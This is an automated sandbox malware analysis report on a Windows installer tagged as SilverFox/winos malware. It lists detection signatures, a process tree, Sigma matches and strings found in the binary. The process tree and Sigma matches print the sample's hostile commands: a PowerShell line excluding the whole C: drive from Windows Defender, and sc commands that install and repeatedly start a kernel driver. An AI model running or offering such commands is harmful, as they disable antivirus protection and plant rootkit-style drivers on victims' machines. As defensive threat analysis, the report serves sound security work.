Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe

Overview

General Information

Sample name:#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
renamed because original name is a hash value
Original sample name:_1.0.4.exe
Analysis ID:1579419
MD5:44728e21199d2b04a4b25798625ac86e
SHA1:382e29a97bb8a34a3164f7464692f16e3526bb1c
SHA256:4cd9b5ec751ac76c5e71d500cd4592dbd4fc7ce4e88ea0187fbc04e66f976cc5
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe (PID: 6036 cmdline: "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" MD5: 44728E21199D2B04A4B25798625AC86E)
    • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp (PID: 3260 cmdline: "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
      • powershell.exe (PID: 4456 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 2588 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT MD5: 44728E21199D2B04A4B25798625AC86E)
        • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp (PID: 7264 cmdline: "C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043E,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
          • 7zr.exe (PID: 7348 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7448 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7304 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7332 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7520 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7536 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7552 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7648 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7660 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7708 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7724 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7784 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7796 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7844 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7860 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7912 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7928 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7980 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7996 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8048 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8108 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8176 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6904 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4444 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2416 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4192 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2828 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7228 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7356 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7332 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7368 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7460 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3068 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7476 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7604 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7588 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7596 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7648 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7712 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7316 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7768 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7840 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7844 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7912 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7980 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8044 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8076 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8088 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8136 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8124 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6992 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6808 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6932 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2000 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7208 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7360 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7356 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7364 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7380 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ParentProcessId: 3260, ParentProcessName: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 4456, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7304, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7332, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ParentProcessId: 3260, ParentProcessName: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 4456, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7304, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7332, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ParentProcessId: 3260, ParentProcessName: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 4456, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 86.6% probability
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1801210662.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1800990919.0000000003840000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA598B0 FindFirstFileA,FindClose,6_2_6CA598B0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00386868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00386868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00387496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00387496
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
